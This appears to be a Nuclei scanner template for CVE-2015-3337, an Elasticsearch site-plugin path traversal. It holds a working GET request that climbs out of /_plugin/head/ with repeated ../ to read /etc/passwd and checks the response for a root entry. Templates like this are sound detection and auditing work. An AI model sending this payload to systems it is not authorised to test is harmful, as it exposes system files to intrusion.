48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2015-3337
|
|
|
|
info:
|
|
name: Elasticsearch - Local File Inclusion
|
|
author: pdteam
|
|
severity: medium
|
|
description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read sensitive files on the server.
|
|
remediation: |
|
|
Upgrade to a patched version of Elasticsearch or apply the necessary security patches.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/37054/
|
|
- https://www.elastic.co/community/security
|
|
- http://www.debian.org/security/2015/dsa-3241
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-3337
|
|
- http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2015-3337
|
|
cwe-id: CWE-22
|
|
epss-score: 0.96187
|
|
epss-percentile: 0.99512
|
|
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: elasticsearch
|
|
product: elasticsearch
|
|
fofa-query: index_not_found_exception
|
|
tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ce84a33308ba91f840d72b0a7827eeac30ca40dc21c36c701fc5dbaa6f157a2b022100f31c7e0fdee69d860230c8851f1f3d5365c67282b42a537b80b3326e2c10b744:922c64590222798bb761d5b6d8e72950 |